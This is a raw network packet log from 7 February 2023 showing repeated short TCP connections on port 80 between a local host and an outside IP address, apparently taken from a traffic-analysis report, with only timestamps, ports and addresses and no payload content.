Feb 7, 2023 20:00:10.007543087 CET	80	50373	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:10.007795095 CET	50373	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:10.110146999 CET	50373	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:10.111099958 CET	50374	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:10.170985937 CET	80	50373	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:10.171061993 CET	50373	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:10.172950029 CET	80	50374	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:10.173091888 CET	50374	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:10.203248024 CET	50374	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:10.264405012 CET	80	50374	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:10.267591953 CET	80	50374	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:10.267776012 CET	50374	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:10.376348972 CET	50374	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:10.377799034 CET	50375	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:10.437541008 CET	80	50374	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:10.437680960 CET	50374	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:10.441195011 CET	80	50375	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:10.441339016 CET	50375	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:10.441776037 CET	50375	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:10.503895044 CET	80	50375	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:10.506551981 CET	80	50375	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:10.506788969 CET	50375	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:10.610475063 CET	50375	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:10.611232996 CET	50376	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:10.671797991 CET	80	50375	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:10.675167084 CET	50375	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:10.675730944 CET	80	50376	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:10.675894022 CET	50376	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:10.676242113 CET	50376	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:10.743802071 CET	80	50376	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:10.743829012 CET	80	50376	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:10.743915081 CET	50376	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:10.860671997 CET	50376	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:10.861633062 CET	50377	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:10.925854921 CET	80	50376	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:10.925899029 CET	80	50377	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:10.926134109 CET	50377	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:10.926717997 CET	50377	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:10.929733992 CET	50376	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:10.989836931 CET	80	50377	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:10.993803024 CET	80	50377	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:10.993894100 CET	50377	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:11.110856056 CET	50377	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:11.112515926 CET	50378	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:11.172626972 CET	80	50377	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:11.172674894 CET	80	50378	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:11.172797918 CET	50377	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:11.172831059 CET	50378	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:11.173249006 CET	50378	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:11.233537912 CET	80	50378	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:11.237833023 CET	80	50378	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:11.238029957 CET	50378	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:11.344223022 CET	50378	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:11.345045090 CET	50379	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:11.404597044 CET	80	50378	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:11.406126976 CET	50378	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:11.407670021 CET	80	50379	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:11.407819033 CET	50379	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:11.418266058 CET	50379	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:11.481074095 CET	80	50379	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:11.483059883 CET	80	50379	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:11.485810995 CET	50379	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:11.594974995 CET	50379	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:11.595704079 CET	50380	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:11.655370951 CET	80	50380	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:11.655528069 CET	50380	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:11.655903101 CET	50380	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:11.657660961 CET	80	50379	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:11.657753944 CET	50379	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:11.715502024 CET	80	50380	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:11.717742920 CET	80	50380	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:11.717886925 CET	50380	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:11.835134029 CET	50380	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:11.835938931 CET	50381	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:11.894896030 CET	80	50380	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:11.895066023 CET	50380	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:11.898462057 CET	80	50381	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:11.899081945 CET	50381	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:11.899081945 CET	50381	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:11.961776018 CET	80	50381	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:11.964369059 CET	80	50381	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:11.966145992 CET	50381	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:12.079054117 CET	50381	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:12.079751968 CET	50382	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:12.141808987 CET	80	50381	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:12.141978025 CET	50381	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:12.142147064 CET	80	50382	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:12.142445087 CET	50382	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:12.143004894 CET	50382	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:12.205658913 CET	80	50382	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:12.209357977 CET	80	50382	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:12.209503889 CET	50382	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:12.318845034 CET	50382	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:12.320832014 CET	50383	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:12.381130934 CET	80	50383	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:12.381278992 CET	50383	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:12.381373882 CET	80	50382	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:12.381480932 CET	50382	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:12.387972116 CET	50383	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:12.448203087 CET	80	50383	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:12.450683117 CET	80	50383	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:12.450817108 CET	50383	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:12.563491106 CET	50383	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:12.564389944 CET	50384	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:12.623836040 CET	80	50383	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:12.623912096 CET	50383	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:12.626914978 CET	80	50384	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:12.627019882 CET	50384	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:12.627470970 CET	50384	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:12.689918041 CET	80	50384	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:12.692548037 CET	80	50384	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:12.692612886 CET	50384	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:12.801779032 CET	50384	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:12.802704096 CET	50385	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:12.862587929 CET	80	50385	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:12.862718105 CET	50385	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:12.863066912 CET	50385	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:12.864496946 CET	80	50384	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:12.864597082 CET	50384	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:12.923233986 CET	80	50385	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:12.925623894 CET	80	50385	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:12.925723076 CET	50385	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:13.031946898 CET	50385	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:13.032847881 CET	50386	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:13.092755079 CET	80	50385	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:13.092878103 CET	50385	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:13.097465038 CET	80	50386	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:13.097560883 CET	50386	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:13.098002911 CET	50386	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:13.161335945 CET	80	50386	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:13.165216923 CET	80	50386	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:13.165317059 CET	50386	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:13.282563925 CET	50386	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:13.283185959 CET	50387	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:13.345082998 CET	80	50386	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:13.345238924 CET	50386	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:13.345562935 CET	80	50387	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:13.345681906 CET	50387	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:13.346041918 CET	50387	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:13.408608913 CET	80	50387	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:13.411418915 CET	80	50387	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:13.411640882 CET	50387	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:13.521579027 CET	50387	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:13.522075891 CET	50388	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:13.582432032 CET	80	50388	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:13.582672119 CET	50388	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:13.583065033 CET	50388	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:13.584029913 CET	80	50387	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:13.584475040 CET	50387	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:13.643270016 CET	80	50388	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:13.645430088 CET	80	50388	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:13.645647049 CET	50388	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:13.751882076 CET	50388	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:13.753535986 CET	50389	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:13.812246084 CET	80	50388	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:13.812443972 CET	50388	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:13.814039946 CET	80	50389	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:13.814266920 CET	50389	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:13.814636946 CET	50389	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:13.875209093 CET	80	50389	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:13.879067898 CET	80	50389	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:13.882195950 CET	50389	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:13.985595942 CET	50389	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:13.986483097 CET	50390	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:14.047384977 CET	80	50389	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:14.047538996 CET	50389	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:14.048332930 CET	80	50390	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:14.048465967 CET	50390	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:14.048984051 CET	50390	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:14.110551119 CET	80	50390	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:14.114309072 CET	80	50390	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:14.120105028 CET	50390	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:14.236367941 CET	50390	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:14.245671988 CET	50391	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:14.297244072 CET	80	50390	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:14.297452927 CET	50390	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:14.310398102 CET	80	50391	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:14.310631990 CET	50391	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:14.311491966 CET	50391	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:14.374855042 CET	80	50391	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:14.375710011 CET	80	50391	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:14.375879049 CET	50391	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:14.485611916 CET	50391	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:14.486490011 CET	50392	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:14.548187017 CET	80	50391	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:14.550266981 CET	80	50392	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:14.550406933 CET	50391	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:14.550455093 CET	50392	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:14.550843954 CET	50392	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:14.613612890 CET	80	50392	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:14.618185043 CET	80	50392	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:14.618302107 CET	50392	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:14.738109112 CET	50392	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:14.739839077 CET	50393	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:14.801584959 CET	80	50392	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:14.801671028 CET	80	50393	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:14.801799059 CET	50392	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:14.801862001 CET	50393	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:14.802336931 CET	50393	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:14.864300013 CET	80	50393	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:14.866986990 CET	80	50393	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:14.867139101 CET	50393	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:14.970622063 CET	50393	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:14.972085953 CET	50394	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:15.032247066 CET	80	50393	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:15.032370090 CET	80	50394	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:15.032397032 CET	50393	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:15.032501936 CET	50394	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:15.033221960 CET	50394	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:15.093732119 CET	80	50394	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:15.097959042 CET	80	50394	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:15.098125935 CET	50394	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:15.204988956 CET	50394	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:15.205694914 CET	50395	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:15.265750885 CET	80	50394	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:15.265876055 CET	50394	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:15.267180920 CET	80	50395	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:15.267272949 CET	50395	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:15.267608881 CET	50395	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:15.329071999 CET	80	50395	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:15.331311941 CET	80	50395	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:15.331439018 CET	50395	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:15.447642088 CET	50395	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:15.448806047 CET	50396	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:15.509324074 CET	80	50395	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:15.509448051 CET	50395	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:15.510257959 CET	80	50396	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:15.510451078 CET	50396	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:15.510797977 CET	50396	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:15.572206974 CET	80	50396	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:15.574445963 CET	80	50396	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:15.574507952 CET	50396	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:15.688613892 CET	50396	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:15.689321041 CET	50397	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:15.750195980 CET	80	50397	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:15.750380039 CET	50397	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:15.750574112 CET	80	50396	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:15.750644922 CET	50396	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:15.752526999 CET	50397	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:15.813076019 CET	80	50397	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:15.815166950 CET	80	50397	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:15.815253973 CET	50397	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:15.926924944 CET	50397	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:15.927624941 CET	50398	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:15.987725019 CET	80	50397	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:15.987828970 CET	50397	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:15.989789963 CET	80	50398	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:15.989936113 CET	50398	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:15.996201038 CET	50398	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:16.058504105 CET	80	50398	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:16.062393904 CET	80	50398	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:16.062575102 CET	50398	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:16.173698902 CET	50398	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:16.175548077 CET	50399	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:16.235971928 CET	80	50398	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:16.236056089 CET	80	50399	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:16.236124992 CET	50398	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:16.236216068 CET	50399	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:16.236682892 CET	50399	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:16.297164917 CET	80	50399	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:16.300178051 CET	80	50399	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:16.300368071 CET	50399	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:16.407816887 CET	50399	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:16.408688068 CET	50400	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:16.468585968 CET	80	50399	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:16.468782902 CET	50399	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:16.470307112 CET	80	50400	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:16.470504045 CET	50400	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:16.471395016 CET	50400	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:16.533119917 CET	80	50400	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:16.535162926 CET	80	50400	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:16.535239935 CET	50400	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:16.642328024 CET	50400	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:16.644004107 CET	50401	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:16.704294920 CET	80	50400	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:16.704366922 CET	80	50401	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:16.704463005 CET	50400	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:16.704549074 CET	50401	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:16.704967022 CET	50401	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:16.765552044 CET	80	50401	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:16.767642021 CET	80	50401	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:16.767870903 CET	50401	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:16.876102924 CET	50401	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:16.876732111 CET	50402	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:16.936767101 CET	80	50401	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:16.936983109 CET	50401	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:16.937305927 CET	80	50402	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:16.937455893 CET	50402	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:16.938937902 CET	50402	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:16.999664068 CET	80	50402	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:17.002080917 CET	80	50402	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:17.002187014 CET	50402	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:17.112518072 CET	50402	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:17.113120079 CET	50403	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:17.173357964 CET	80	50402	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:17.173537970 CET	50402	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:17.174650908 CET	80	50403	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:17.174849987 CET	50403	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:17.175192118 CET	50403	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:17.236745119 CET	80	50403	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:17.241225958 CET	80	50403	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:17.242980957 CET	50403	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:17.345035076 CET	50403	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:17.345959902 CET	50404	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:17.406929970 CET	80	50403	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:17.407084942 CET	50403	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:17.407552004 CET	80	50404	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:17.407676935 CET	50404	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:17.416361094 CET	50404	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:17.477855921 CET	80	50404	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:17.480040073 CET	80	50404	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:17.484481096 CET	50404	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:17.595004082 CET	50404	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:17.595709085 CET	50405	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:17.656873941 CET	80	50405	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:17.656913996 CET	80	50404	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:17.656964064 CET	50405	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:17.657011032 CET	50404	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:17.657437086 CET	50405	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:17.717721939 CET	80	50405	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:17.719861031 CET	80	50405	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:17.720006943 CET	50405	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:17.846014977 CET	50405	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:17.846915007 CET	50406	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:17.906635046 CET	80	50405	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:17.906827927 CET	50405	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:17.909601927 CET	80	50406	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:17.909794092 CET	50406	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:17.910531998 CET	50406	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:17.973280907 CET	80	50406	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:17.976032019 CET	80	50406	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:17.976216078 CET	50406	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:18.079430103 CET	50406	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:18.080195904 CET	50407	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:18.140765905 CET	80	50407	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:18.141032934 CET	50407	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:18.142046928 CET	50407	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:18.142416954 CET	80	50406	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:18.142544985 CET	50406	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:18.202539921 CET	80	50407	62.204.41.4	192.168.2.5
